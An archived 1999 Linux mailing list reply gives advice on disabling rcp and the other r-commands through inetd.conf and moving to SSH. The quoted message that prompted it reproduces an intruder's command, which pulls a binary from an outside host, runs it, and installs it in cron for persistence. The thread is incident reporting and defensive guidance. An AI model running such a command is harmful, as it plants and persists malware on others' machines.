[OLUG] RCP
Tim Russell
russell at probe.net
Tue Dec 14 19:22:17 UTC 1999
Of course, the final way to stop RCP and the other "r" commands is to
comment them out in your /etc/inetd.conf file. Another one of the first
things I do to a new box is comment EVERYTHING out of there except telnet,
ftp, and possibly identd. Then I restrict those services through the
/etc/hosts.allow and /etc/hosts.deny file.
Rlogin and such might be okay when you're sitting behind a good firewall
(might), but they have no business being enabled on any internet-accessable
machine these days. Everything you can do with them you can do securely and
encrypted with SSH.
Tim
P.S. Do a "kill -HUP" on your inetd process, or reboot, after changing
inetd.conf.
-----Original Message-----
From: Todd <buster18 at home.com>
To: olug at bstc.net <olug at bstc.net>
Date: Tuesday, December 14, 1999 11:40 AM
Subject: [OLUG] RCP
> Can anyone tell me how to stop RCP access to my Linux box, and if there
are
>any security tools available to monitor a RCP connection. On December 11
>someone gained access and perfomed the following to my machine:
>rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
>/usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
>/usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
> I currently am running logwatch and uwatch, but this connection did not
>show up in either. Any suggestions would be welcomed.
-------------------------------------------------------------------------
Sent by OLUG Mailing list Manager, run by ezmlm. http://olug.bstc.net/
To unsubscribe: `echo unsubsribe | mail olug-unsubscribe at bstc.net`
More information about the OLUG
mailing list